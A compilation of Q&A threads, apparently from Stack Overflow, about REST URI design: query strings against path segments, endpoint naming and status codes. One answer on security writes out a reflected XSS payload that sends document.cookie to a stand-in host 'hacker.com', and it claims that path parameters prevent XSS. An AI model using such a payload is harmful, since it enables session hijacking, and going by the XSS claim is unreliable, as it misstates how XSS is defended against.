URI naming schema for API with virtual resources + boolean parameter - rest

I am designing my first web API, and I'm having difficulties settling on a naming scheme for the URIs.
The API does not address actual resources, instead it is being made to accept a query, run some logic on the query string, accumulate respective results from different other APIs, perhaps run some logic on the accumulated result again, and return the result.
I have started to set up the single GET that exists as follows (returns "result" object in JSON).
api.example.com/query?string=foo&otherparam=bar
However, I'm unsure whether this follows best practices.
Problem 1
I'm starting to think that in order to follow best practices for API design, the endpoint name shouldn't actually be query, it should be result, but as I don't actually have resources, this is a bit counterintuitive.
So question 1 would be: Is api.example.com/result the better endpoint name?
Problem 2
This refers to semantic URLs. Consider the following example from Wikipedia: Semantic URLs.
Non-semantic URL:
http://example.com/products?category=12&pid=25
Semantic URL:
http://example.com/products/12/25
Semantic URL adapted for my case:
http://api.example.com/result/foo/bar
This is very logical and works well if you have actual resources that you look up. In my case, however, the parameter string is the query string, and the parameter otherparam is a boolean describing a property of the query string.
So question 2 is really: If the answer to question 1 is "yes", what should a semanticized URL in my case be:
http://api.example.com/results/foo/bar?
http://api.example.com/results/foo?otherparam=bar?
(results should be plural I guess as it's describing the list of possible results.)

No, I do not think result is a good endpoint name. Besides, result is super generic and doesn't imply anything.
When I design APIs, the endpoints can either be resources or actions on resources
https://api.example.com/accounts/1/authorize - the resource here is accounts and the action is authorize
https://api.example.com/search - the resource here would be the entire platform so any resource could be returned and the action is search
So is there any type of resource you can attach to the query action? Or it sounds like this type of endpoint would suit you better?
https://api.example.com/logic/run

Related

Is it okay to use HTTP POST method with a query string, if a query string is used to find the resources that need to be updated?

My HTTP API has a method that updates resources found by filter. Practically it is a POST method, that utilizes a query string to find desired resources and transfers data in its body to update found resources:
POST /module/resources?field_1=abc&field_2=def&field_n=xyz
body: {
"desired_field":"desired_data"
}
I've heard it might be a code smell using a POST method and a query string together, but in the case presented above it seems perfectly reasonable to me.
Am I making wrong assumptions here?
Is it okay to use HTTP POST method with a query string, if a query string is used to find the resources that need to be updated?
Yes.
Am I making wrong assumptions here?
No.
The key ideas being that you, as the author of the resource, get to choose its identifier
REST relies instead on the author choosing a resource identifier that best fits the nature of the concept being identified. -- Fielding, 2000
the query is part of the resource identifier
The query component contains non-hierarchical data that, along with data in the path component (Section 3.3), serves to identify a resource within the scope of the URI's scheme and naming authority -- RFC 3986
and that the semantics of HTTP methods are standardized across all resources
Once defined, a standardized method ought to have the same semantics when applied to any resource, though each resource determines for itself whether those semantics are implemented or allowed. -- RFC 7231
When talking about resources, there's from a HTTP/REST perspective no difference between:
/article/1
/article?id=1
So if you do a GET request on either of these to get the article, you can do a PUT or PATCH on either of those to make changes.
However, the way many developers think of query parameters and POST bodies is often 'just a different way to send parameters'. This is incorrect, because they have a pretty distinct meaning, but using both at the same time may confuse some people.
So on a protocol level what you're doing is perfectly fine. I'd argue it's kind of elegant to use the URI as the locator and the body as the main message.

What is the RESTful way to design URL that returns parent of a child resource?

I am modeling blogging REST API which has resources Blog, Post and Comment with following URLs:
/api/blogs
/api/blogs/{blogId}
/api/blogs/{blogId}/posts
and I create separate endpoint for all Posts in and their Comment`s:
/api/posts
/api/posts/{postId}
/api/posts/{postId}/comments
Given that I have postId, what is the RESTful way to get Blog for a specific Post? I have three ideas:
1. /api/posts/{postId}/blog
2. /api/blogs/parent-of-post/{postId}
3. /api/blogs?postId={postId}
To me the 1. URL looks more "prettier" but the 2. option looks more "logical" since that endpoint (eg. /api/blogs/*) is generally for blogs resources.
The third option uses query string as parameter but the issue I have with it is that this endpoint would return different type of body depending on the parameter. Eg. without parameter /api/blogs returns a collection of Blog resources, while with parameter postId it would return just single instance of Blog. I am not sure if this is good thing to do (especially because I am using ASP.NET Core and C# which has strongly typed return objects, so implementation might be awkward).
what is the RESTful way to get Blog for a specific Post?
Real answer: anything you want.
REST doesn't care what spelling conventions you use for your resource identifiers. As long as your identifiers conform to the production rules described by RFC 3986, you are good to go.
/api/blogs?postId={postId}
This is a perfectly normal choice, and turns out to be a really convenient one when you want to use general purpose web browsers, because HTML forms already have standards that make it easy to create URI with this shape.
Your other two choices are fine; they lose a point for not being HTML form friendly, but it's still easy enough to describe these identifiers using a URI template.
The third option uses query string as parameter but the issue I have with it is that this endpoint would return different type of body depending on the parameter
General purpose API consumers do NOT assume that two resources are alike just because the spellings of their identifiers overlap each other.
Which is to say, from the outside, there is no implied relationship between
/api/blogs
/api/blogs/1
/api/blogs?postId=2
so the fact that they return different bodies really isn't going to be a surprise to a general purpose consumer.
Now, your routing framework may not support returning different types from the handlers for these resources (or, more likely, may not have any "nice" way to do the routing automatically), but that's an implementation detail deliberately hidden behind the REST API facade.
Similarly, the human beings that read your access log might prefer one spelling to another, to reduce their own cognitive load.

RESTfully Fetching by Attribute

Which of the following URLs is more RESTful compliant when it comes to fetch only items that have a certain value for attribute?
GET: /items/attribute/{value}
GET: /items/findByAttribute?attribute={value}
GET: /items?attribute={value}
Having in mind that GET: /items returns all items.
Example
GET: /shirts/color/FF9900
GET: /shirts/findByColor?color=FF9900
GET: /shirts?color=FF9900
I think that the last option is the correct one ;-)
Here are some comments for the others:
Generally the path element right after the one that corresponds to the list resource is the identifier of the element. So if you use something at this level, it could be considered as an identifier...
You can have resource to manage a particular field but the URL would be something like /items/{itemid}/fieldname.
You shouldn't use "action names" within the URL (in your example findByAttribute). The HTTP method should correspond to the "action" itself. See this answer if you want to support several actions for an HTTP method: How to Update a REST Resource Collection.
There is a question about how to design search filter: How to desing RESTful advanced search/filter. I think that your use case if a bit simple and using query parameters matches for you.
Otherwise I wrote a post about the way to design a Web API. This could be useful for you. See this link: https://templth.wordpress.com/2014/12/15/designing-a-web-api/.
Hope it helps you,
Thierry
Most certainly this one
GET: /items?attribute={value}
Why?
GET: /items/attribute/{value} is wrong because with REST, url segments represent resources, attribute is not a resource
GET: /items/findByAttribute?attribute={value} is wrong for the same reason really. findByAttribute is not a resource
Using url queries to filter by attributes is perfectly fine, so go with that.
URI semantics are irrelevant to REST. It doesn't make sense to ask which URI is more RESTful. What makes an URI RESTful or not is how the client obtains it. If he's reading URI patterns in documentation and filling placeholders with values, it's not RESTful. If this is news for you, I recommend reading this.
With that in mind, all three examples can be RESTful if the server provided that URI template to the client as a link to query the collection resource filtering by that value, but 3 is definitely the best option since it follows a more conventional query syntax. I wouldn't use 2 since it implies a method call and it looks too RPC for my taste, and I wouldn't use 1 since it implies for a human that it will return only the attribute as a resource.

RESTful API required parameters in query string?

When designing a RESTful API, what to do if a GET request only makes sense if there are specific parameters associated with the request? Should the parameters be passed as a query string, and if so, what to do when all the parameters aren't specified or are formatted incorrectly?
For example, lets say i have a Post resource, which can be accessed by `api/posts` endpoint. Each post has a geographical location, and posts can be retrieved ONLY when specifying an area that the posts may reside in. Thus, 3 parameters are required: latitude, longitude and radius.
I can think of 2 options in this case:
1. Putting the parameters in query string: api/posts/?lat=5.54158&lng=71.5486&radius=10
2. Putting the parameters in the URL: api/posts/lat/5.54158/lng/71.5486/radius/10
Which of these would be the correct approach? It seems wrong to put required parameters in the query string, but the latter approach feels somewhat 'uglier'.
PS. I'm aware there are many discussion on this topic already (for example: REST API Best practices: Where to put parameters?), but my question is specifically addressed to the case when parameters are required, not optional.
The first approach is better.
api/posts/?lat=5.54158&lng=71.5486&radius=10
The second approach is a little misleading.
api/posts/lat/5.54158/lng/71.5486/radius/10
You should think of each of your directories as resources. In this cause, sub-resources (for example: "api/posts/lat/5.54158") are not really resources and thus misleading. There are cases where this pattern is a better solution, but looking at what's given, I'd go with using the query string. Unless you have some entity linking to link you directly to this URL, I don't really like it.
You should put everything in the query string and set the server to return an error code when not receiving the 3 required parameters.
Because it's a group of parameter that identify an object.
Taking the example:
lat=5.54158; lng=71.5486 radius=10
It would be very unlikely to this url make sense:
api/posts/lat/5.54158/lng/yyyy/radius/zz
It's different than:
api/memb/35/..
because the member with id 35 can have a lot of functions ( so, valid urls ) as:
api/memb/35/status or
api/memb/35/lastlogin
When designing a RESTful API, what to do if a GET request only makes
sense if there are specific parameters associated with the request?
Should the parameters be passed as a query string, and if so, what to
do when all the parameters aren't specified or are formatted
incorrectly?
By REST your API must fulfill the REST constraints, which are described in the Fielding dissertation. One of these constraints is the uniform interface constraint, which includes the HATEOAS constraint. According to the HATEOAS constraint your API must serve a standard hypermedia format as response. This hypermedia contains hyperlinks (e.g. HTML links, forms) annotated with metadata (e.g. link relation or RDF annotation). The clients check the metadata, which explains to them what the hyperlink does. After that they can decide whether they want to follow the link or not. When they follow the link, they can build the HTTP request based on the URI template, parameters, etc... and send it to the REST service.
In your case it does not matter which URI structure you use, it is for service usage only, since the client always uses the given URI template and the client does not care what is in that template until it is a valid URI template which it can fill with parameters.
In most of the cases your client has enough validation information to test whether the params are incorrect or missing. In that case it does not send a HTTP request, so you have nothing to do in the service. If an invalid param gets through, then in your case your service sends back a 404 - not found, since the URI is the resource identifier, and no resource belongs to an invalid URI (generated from the given URI template and invalid params).

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.
There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".
There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)
The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.
The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.
This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.
By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.
By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.